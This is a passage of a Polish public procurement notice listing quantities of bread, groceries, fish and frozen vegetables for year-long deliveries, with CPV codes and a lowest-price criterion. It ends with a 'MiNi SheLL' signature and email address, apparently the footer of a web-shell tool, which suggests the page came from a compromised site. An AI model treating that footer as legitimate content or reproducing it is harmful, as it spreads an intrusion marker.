9.		Rogal bez dodatku cukru 100g	szt.	1.800		
10.		Rogaliki drożdżowe drobne  
z marmoladą wyrób cukierniczy	kg	10		
11.		Ciastka kruche	kg	15		
12.		Pączki 100g	szt.	130.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Różne artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kosztorys cenowy na sukcesywne dostawy różnych artykułów spożywczych.
L.p.	Nazwa  artykułu	Jedn.
miary	Ilość	Cena brutto	Wartość brutto 
1	2	3	4	5	6
1.		Ananasy puszka 565 g	szt.	200		
2.		Barszcz biały w butelce 0,50 l	szt.	650		
3.		Brzoskwinie w puszcze 830g	szt.	100		
4.		Budyń smaki różne 40g	szt.	1.000		
5.		Chrzan 200g	szt.	200		
6.		Cukier	kg	2.700		
7.		Cukier puder 400g	szt.	      40		
8.		Cukier waniliowy 32 g	szt.	50		
9.		Drożdże 100g	szt.	100		
10.		Dżemy różne smaki 280g	szt.	2.400		
11.		Fasola czerwona puszka 400g	szt.	100		
12.		Galaretka owocowa smaki różne 75g	szt.	40		
13.		Gałka muszkatołowa mielona 15 g	szt.	8		
14.		Groszek konserwowy 400g	szt.	400		
15.		Herbata granulowana 100g	szt.	1.500 		
16.		Imbir mielony 20 g	szt.	8		
17.		Kakao 100g	szt.	10		
18.		Kasza jęczmienna	kg	650		
19.		Kasza manna 	kg	200		
20.		Keczup łagodny 500 g	szt.	150		
21.		Kisiel 40g	szt.	1.000		
22.		Koncentrat pomidorowy 30 % 950g	szt.	300		
23.		Kukurydza w puszcze 400g	szt.	    350		
24.		Kwasek cytrynowy 20g	szt.	    150		
25.		Liść laurowy 10g	szt.	120		
26.		Majeranek 10g	szt.	350		
27.		Majonez  600 g lub 600 ml	szt.	400		
28.		Mak 400g	szt.	10		
29.		Makaron gruby 	kg	1.200		
30.		Makaron wstążka - nitka 	kg	500		
31.		Makaron zacierka 0,25 kg	szt. 	750		
32.		Masło roślinne kubek 250g	szt.	1.500		
33.		Mąka pszenna	kg	    1.200		
34.		Mąka tortowa	kg	100		
35.		Mąka ziemniaczana	kg 	    60		
36.		Miód 25g	szt.	5.000		
37.		Musztarda 190 g	szt.	150		
38.		Ocet 0,50 l	szt.	      15		
39.		Ogórek konserwowy  870g/0,90 l	szt.	100		
40.		Olej 1 l 	szt.	750		
41.		Papryka konserwowa  870g/0,90 l	szt.	100		
42.		Papryka słodka 20 g	szt.	150		
43.		Pieprz mielony 15 g	szt.	700		
44.		Płatki jęczmienne 0,40 kg	szt.	    300		
45.		Płatki kukurydziane 0,25 kg	szt.	700		
46.		Płatki owsiane 0,50 kg	szt.	   350		
47.		Proszek do pieczenia 36g	szt.	60		
48.		Przyprawa do potraw 200 g	szt.	1.100 		
49.		Przyprawa w płynie 1 l	szt.	40		
50.		Przyprawa do drobiu 20 g	szt.	50		
51.		Ryż 1 kg	kg	700		
52.		Seler konserwowy słoik 300 g	szt.	250		
53.		Sól jodowana 1 kg	kg	600		
54.		Ziele angielskie 15 g (całe ziarna)	szt.	    250		
55.		Żelatyna 50 g	szt.	      150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.33.00.00-0, 15.41.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ryby i konserwy rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kosztorys cenowy na sukcesywne dostawy ryb i konserw rybnych

L.p.	      Nazwa  artykułu	Jedn.
miary	Ilość	Cena 
brutto	Wartość
brutto
 
1	2	3	4	5	6
1.		Filet z miruny ze skórą	kg	700		
2.		Karp filet	kg	15		
3.		Rolmopsy	kg	12		
4.		Śledzie po kaszubsku	kg	150		
5.		Makrela wędzona	kg	300		
6.		Paprykarz szczeciński 130 g	szt.	1.200		
7.		Szprot w oleju 125 g	szt.	1.400		
8.		Szprot w pomidorach 125g	   szt.	2.000		
9.		Śledź po wiejsku	kg	150		
10.		Tuńczyk w sosie własnym 170 g	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kosztorys cenowy na sukcesywne dostawy warzyw i owoców mrożonych 
L.p.	Nazwa  artykułu	Jedn.
miary	Ilość	Cena
brutto	Wartość
brutt0
 
1	2	3	4	5	6
1.		Brokuły mrożone	kg	700		
2.		Fasolka szparagowa mrożona	kg	1.000		
3.		Leczo 	kg	200		
4.		Mieszanka kompotowa 
opak 2,50 kg	kg	1.050		
5.		Mieszanka warzywna 
7 składnikowa	kg	300		
6.		Szpinak mrożony 	kg	50		
7.		Włoszczyzna mrożona paski 	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com